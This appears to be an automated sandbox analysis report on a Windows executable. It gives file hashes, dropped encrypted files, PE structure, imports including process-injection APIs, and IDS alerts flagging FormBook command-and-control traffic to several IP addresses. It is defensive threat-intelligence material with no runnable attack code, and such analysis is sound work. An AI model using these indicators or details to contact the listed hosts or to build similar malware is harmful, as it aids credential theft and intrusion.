                                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                              Malicious:false
                                                                              Reputation:moderate, very likely benign file
                                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\Halitherses

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287744
                                                                              Entropy (8bit):7.994497537219416
                                                                              Encrypted:true
                                                                              SSDEEP:6144:lLEM3hfMN9F9Ls1QwRxX8aOeybQrBG7TDdhjRcCnBA7VMmSBUjl:+SfMN79A1Qg8llbQ05AqmSBUjl
                                                                              MD5:D19C951F8A1EF322D779439555D66BE2
                                                                              SHA1:8A7DB18E89BD10533396D2946C2DDA526E36454F
                                                                              SHA-256:75E4ACD92558B91EB98B4097CDA515C59C47CA658A6CFF8F7F0F490EF2E2B8D0
                                                                              SHA-512:124F6BD99F94EBE1BA28952C689C292A086C2C279406A77F81FDD25BFBB9438D432B053E6E3C2F822E8D67A15CAC3E5569ADA2D278E954D7F8F935A89CBA96D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:}k.7;EZECL0O..W9.BL8YPEE.BN1P601178EZEGL0OKLW9YBL8YPEEIBN1P6.1176Z.KG.9.j.Vu.c.P0#e5;-)C1[.RPYV*.e%).=>"wP7b.w.p(*-'`<]<.1178EZE>M9.v,0.d"+.d0".S...jVW.+...f% .*..kY>..Q:8x%..N1P60117h.ZE.M1O...oYBL8YPEE.BL0[7;11e<EZEGL0OKL.-YBL(YPE5MBN1.60!178GZEAL0OKLW9_BL8YPEEI2J1P401178EXE..0O[LW)YBL8IPEUIBN1P6 1178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0Oe82A-BL8..AEIRN1Pd411'8EZEGL0OKLW9YBl8Y0EEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL

                                                                              C:\Users\user\AppData\Local\Temp\aut1E9C.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\ofZiNLLKZU.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):287744
                                                                              Entropy (8bit):7.994497537219416
                                                                              Encrypted:true
                                                                              SSDEEP:6144:lLEM3hfMN9F9Ls1QwRxX8aOeybQrBG7TDdhjRcCnBA7VMmSBUjl:+SfMN79A1Qg8llbQ05AqmSBUjl
                                                                              MD5:D19C951F8A1EF322D779439555D66BE2
                                                                              SHA1:8A7DB18E89BD10533396D2946C2DDA526E36454F
                                                                              SHA-256:75E4ACD92558B91EB98B4097CDA515C59C47CA658A6CFF8F7F0F490EF2E2B8D0
                                                                              SHA-512:124F6BD99F94EBE1BA28952C689C292A086C2C279406A77F81FDD25BFBB9438D432B053E6E3C2F822E8D67A15CAC3E5569ADA2D278E954D7F8F935A89CBA96D3
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:}k.7;EZECL0O..W9.BL8YPEE.BN1P601178EZEGL0OKLW9YBL8YPEEIBN1P6.1176Z.KG.9.j.Vu.c.P0#e5;-)C1[.RPYV*.e%).=>"wP7b.w.p(*-'`<]<.1178EZE>M9.v,0.d"+.d0".S...jVW.+...f% .*..kY>..Q:8x%..N1P60117h.ZE.M1O...oYBL8YPEE.BL0[7;11e<EZEGL0OKL.-YBL(YPE5MBN1.60!178GZEAL0OKLW9_BL8YPEEI2J1P401178EXE..0O[LW)YBL8IPEUIBN1P6 1178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0Oe82A-BL8..AEIRN1Pd411'8EZEGL0OKLW9YBl8Y0EEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL0OKLW9YBL8YPEEIBN1P601178EZEGL

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.152298685936598
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:ofZiNLLKZU.exe
                                                                              File size:1'265'664 bytes
                                                                              MD5:68056372ed7e2ab369235bf4c2e9cfb5
                                                                              SHA1:d75a067e94a4da806d391ea85892cc9608e6f455
                                                                              SHA256:eeeaa1d7c634e0cc3f1550e756208a118f28be191b374ba6a2e3690f89949751
                                                                              SHA512:5a5f4ed5b692bbb6c128ae2c5bfa6d76d8d4e343ce99d5531ab2d94f9446e32076eef80c6f92eda38ee1655dc551a7fde58346e3184eb6267d8c334acb9c15e6
                                                                              SSDEEP:24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8aLmH8O1q8vKs4u1I0F7:XTvC/MTQYxsWR7aLmZq3vWT
                                                                              TLSH:3145C00273D1C072FF9BA2334F5AF6515ABC69260123A62F13981D79BE701B1563E7A3
                                                                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                                                                              File Icon

                                                                              Icon Hash:aaf3e3e3938382a0

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x420577
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x676210D2 [Wed Dec 18 00:01:22 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:948cc502fe9226992dce9417f952fce3

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              call 00007EFE84CE2B63h
                                                                              jmp 00007EFE84CE246Fh
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007EFE84CE264Dh
                                                                              mov dword ptr [esi], 0049FDF0h
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FDF8h
                                                                              mov dword ptr [ecx], 0049FDF0h
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              call 00007EFE84CE261Ah
                                                                              mov dword ptr [esi], 0049FE0Ch
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              and dword ptr [ecx+04h], 00000000h
                                                                              mov eax, ecx
                                                                              and dword ptr [ecx+08h], 00000000h
                                                                              mov dword ptr [ecx+04h], 0049FE14h
                                                                              mov dword ptr [ecx], 0049FE0Ch
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              and dword ptr [eax], 00000000h
                                                                              and dword ptr [eax+04h], 00000000h
                                                                              push eax
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              add eax, 04h
                                                                              push eax
                                                                              call 00007EFE84CE520Dh
                                                                              pop ecx
                                                                              pop ecx
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              lea eax, dword ptr [ecx+04h]
                                                                              mov dword ptr [ecx], 0049FDD0h
                                                                              push eax
                                                                              call 00007EFE84CE5258h
                                                                              pop ecx
                                                                              ret
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              lea eax, dword ptr [esi+04h]
                                                                              mov dword ptr [esi], 0049FDD0h
                                                                              push eax
                                                                              call 00007EFE84CE5241h
                                                                              test byte ptr [ebp+08h], 00000001h
                                                                              pop ecx

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5e498.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1330000x7594.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xd40000x5e4980x5e60007c242f6dbc9014cc9ecd81e7af261cbFalse0.9301091680463576data7.90002679251262IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1330000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                              RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                              RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                              RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                              RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                              RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                              RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                              RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                              RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                                              RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                              RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                                              RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                              RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                              RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                              RT_RCDATA0xdc7b80x5575ddata1.0003313859646616
                                                                              RT_GROUP_ICON0x131f180x76dataEnglishGreat Britain0.6610169491525424
                                                                              RT_GROUP_ICON0x131f900x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0x131fa40x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0x131fb80x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0x131fcc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                              RT_MANIFEST0x1320a80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                              Imports

                                                                              DLLImport
                                                                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                              UxTheme.dllIsThemeActive
                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-10T18:54:13.696505+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849711104.21.28.6580TCP
                                                                              2025-01-10T18:54:16.410603+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849712104.21.28.6580TCP
                                                                              2025-01-10T18:54:18.902834+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849713104.21.28.6580TCP
                                                                              2025-01-10T18:54:28.889425+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849715172.67.138.13880TCP
                                                                              2025-01-10T18:54:31.436376+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849718172.67.138.13880TCP
                                                                              2025-01-10T18:54:33.983258+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849719172.67.138.13880TCP
                                                                              2025-01-10T18:55:20.841779+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972169.57.163.6480TCP
                                                                              2025-01-10T18:55:23.389513+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972269.57.163.6480TCP
                                                                              2025-01-10T18:55:25.919332+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.84972369.57.163.6480TCP
                                                                              2025-01-10T18:55:35.244239+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849725101.32.205.6180TCP
                                                                              2025-01-10T18:55:37.684101+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849726101.32.205.6180TCP
                                                                              2025-01-10T18:55:40.303895+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849727101.32.205.6180TCP
                                                                              2025-01-10T18:55:50.108422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849729103.159.36.6680TCP
                                                                              2025-01-10T18:55:52.655340+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849730103.159.36.6680TCP
                                                                              2025-01-10T18:55:55.202255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849731103.159.36.6680TCP
                                                                              2025-01-10T18:56:03.712870+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849733103.168.172.3780TCP
                                                                              2025-01-10T18:56:07.234547+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849734103.168.172.3780TCP
                                                                              2025-01-10T18:56:08.851280+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849735103.168.172.3780TCP
                                                                              2025-01-10T18:56:17.936704+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849737188.114.96.380TCP
                                                                              2025-01-10T18:56:20.484198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.849738188.114.96.380TCP
